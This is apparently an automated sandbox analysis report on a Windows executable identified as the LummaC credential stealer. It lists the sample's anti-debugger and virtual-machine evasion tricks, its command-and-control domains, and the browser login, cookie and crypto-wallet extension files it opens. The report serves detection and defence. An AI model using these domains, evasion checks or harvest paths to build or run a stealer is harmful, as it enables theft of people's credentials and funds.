                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A10BDE second address: 4A10C51 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0D81741h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+0Ch] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FF3D0D8173Ch 0x00000013 or ecx, 0F7E5EC8h 0x00000019 jmp 00007FF3D0D8173Bh 0x0000001e popfd 0x0000001f mov ecx, 20DD1C3Fh 0x00000024 popad 0x00000025 test esi, esi 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007FF3D0D81747h 0x00000030 jmp 00007FF3D0D81743h 0x00000035 popfd 0x00000036 mov di, cx 0x00000039 popad 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A10C51 second address: 4A10C57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A10C57 second address: 4A10C5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A10C5B second address: 4A10C9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FF4419362FAh 0x0000000e jmp 00007FF3D0F68BB3h 0x00000013 cmp dword ptr [7544459Ch], 05h 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FF3D0F68BB5h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A10D08 second address: 4A10D47 instructions: 0x00000000 rdtsc 0x00000002 movzx esi, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ax, di 0x0000000a popad 0x0000000b push ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov esi, ebx 0x00000011 pushfd 0x00000012 jmp 00007FF3D0D81745h 0x00000017 xor ax, 86D6h 0x0000001c jmp 00007FF3D0D81741h 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A10D47 second address: 4A10D4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeSpecial instruction interceptor: First address: 9589B7 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeSpecial instruction interceptor: First address: AFB363 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeSpecial instruction interceptor: First address: AFB760 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeSpecial instruction interceptor: First address: B2BD26 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeSpecial instruction interceptor: First address: B87428 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe TID: 1464Thread sleep time: -150000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe TID: 1464Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: onaUtwpiyq.exe, onaUtwpiyq.exe, 00000000.00000002.1561200689.0000000000ADF000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: onaUtwpiyq.exe, 00000000.00000003.1430015871.0000000005380000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696497155j
                Source: onaUtwpiyq.exe, 00000000.00000003.1430015871.0000000005380000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696497155
                Source: onaUtwpiyq.exe, 00000000.00000003.1430015871.0000000005380000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696497155t
                Source: onaUtwpiyq.exe, 00000000.00000003.1430015871.0000000005380000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
                Source: onaUtwpiyq.exe, 00000000.00000003.1524399042.0000000000792000.00000004.00000020.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1506136966.0000000000791000.00000004.00000020.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1405319597.000000000078B000.00000004.00000020.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1559836333.0000000000792000.00000004.00000020.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000002.1560440942.0000000000758000.00000004.00000020.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000002.1560751027.0000000000792000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: onaUtwpiyq.exe, 00000000.00000003.1430015871.0000000005380000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
                Source: onaUtwpiyq.exe, 00000000.00000003.1430015871.0000000005380000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
                Source: onaUtwpiyq.exe, 00000000.00000003.1430015871.0000000005380000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696497155o
                Source: onaUtwpiyq.exe, 00000000.00000003.1430015871.0000000005380000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
                Source: onaUtwpiyq.exe, 00000000.00000003.1430015871.0000000005380000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
                Source: onaUtwpiyq.exe, 00000000.00000003.1430015871.0000000005380000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696497155x
                Source: onaUtwpiyq.exe, 00000000.00000003.1430015871.0000000005380000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696497155
                Source: onaUtwpiyq.exe, 00000000.00000003.1430015871.0000000005380000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
                Source: onaUtwpiyq.exe, 00000000.00000003.1430015871.0000000005380000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
                Source: onaUtwpiyq.exe, 00000000.00000003.1430015871.0000000005380000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
                Source: onaUtwpiyq.exe, 00000000.00000003.1430015871.0000000005380000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
                Source: onaUtwpiyq.exe, 00000000.00000003.1430015871.0000000005380000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
                Source: onaUtwpiyq.exe, 00000000.00000003.1430015871.0000000005380000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
                Source: onaUtwpiyq.exe, 00000000.00000003.1429856889.00000000053E5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696497155p
                Source: onaUtwpiyq.exe, 00000000.00000003.1430015871.0000000005380000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696497155
                Source: onaUtwpiyq.exe, 00000000.00000003.1430015871.0000000005380000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696497155
                Source: onaUtwpiyq.exe, 00000000.00000003.1430015871.0000000005380000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
                Source: onaUtwpiyq.exe, 00000000.00000003.1430015871.0000000005380000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
                Source: onaUtwpiyq.exe, 00000000.00000003.1430015871.0000000005380000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
                Source: onaUtwpiyq.exe, 00000000.00000003.1430015871.0000000005380000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
                Source: onaUtwpiyq.exe, 00000000.00000003.1430015871.0000000005380000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696497155f
                Source: onaUtwpiyq.exe, 00000000.00000003.1430015871.0000000005380000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
                Source: onaUtwpiyq.exe, 00000000.00000003.1430015871.0000000005380000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
                Source: onaUtwpiyq.exe, 00000000.00000003.1430015871.0000000005380000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696497155t
                Source: onaUtwpiyq.exe, 00000000.00000003.1430015871.0000000005380000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696497155s
                Source: onaUtwpiyq.exe, 00000000.00000002.1561200689.0000000000ADF000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: onaUtwpiyq.exe, 00000000.00000003.1430015871.0000000005380000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
                Source: onaUtwpiyq.exe, 00000000.00000003.1430015871.0000000005380000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
                Source: onaUtwpiyq.exe, 00000000.00000003.1430015871.0000000005380000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: SICE
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeProcess queried: DebugPortJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                LummaC encrypted strings found
                Source: onaUtwpiyq.exeString found in binary or memory: hummskitnj.buzz
                Source: onaUtwpiyq.exeString found in binary or memory: appliacnesot.buzz
                Source: onaUtwpiyq.exeString found in binary or memory: cashfuzysao.buzz
                Source: onaUtwpiyq.exeString found in binary or memory: inherineau.buzz
                Source: onaUtwpiyq.exeString found in binary or memory: screwamusresz.buzz
                Source: onaUtwpiyq.exeString found in binary or memory: rebuildeso.buzz
                Source: onaUtwpiyq.exeString found in binary or memory: scentniej.buzz
                Source: onaUtwpiyq.exeString found in binary or memory: mindhandru.buzz
                Source: onaUtwpiyq.exeString found in binary or memory: prisonyfork.buzz
                Source: onaUtwpiyq.exe, onaUtwpiyq.exe, 00000000.00000002.1561200689.0000000000ADF000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: zProgram Manager
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: onaUtwpiyq.exe, onaUtwpiyq.exe, 00000000.00000003.1506136966.0000000000791000.00000004.00000020.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1506033237.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1559763702.00000000007F9000.00000004.00000020.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1559590194.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1550901642.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000002.1560904316.00000000007FA000.00000004.00000020.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1524291361.00000000007F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: onaUtwpiyq.exe PID: 3784, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Found many strings related to Crypto-Wallets (likely being stolen)
                Source: onaUtwpiyq.exe, 00000000.00000003.1506136966.0000000000791000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum-LTC
                Source: onaUtwpiyq.exeString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                Source: onaUtwpiyq.exe, 00000000.00000003.1524399042.0000000000792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: onaUtwpiyq.exeString found in binary or memory: Wallets/Exodus
                Source: onaUtwpiyq.exe, 00000000.00000003.1524399042.0000000000792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
                Source: onaUtwpiyq.exeString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: onaUtwpiyq.exeString found in binary or memory: keystore
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
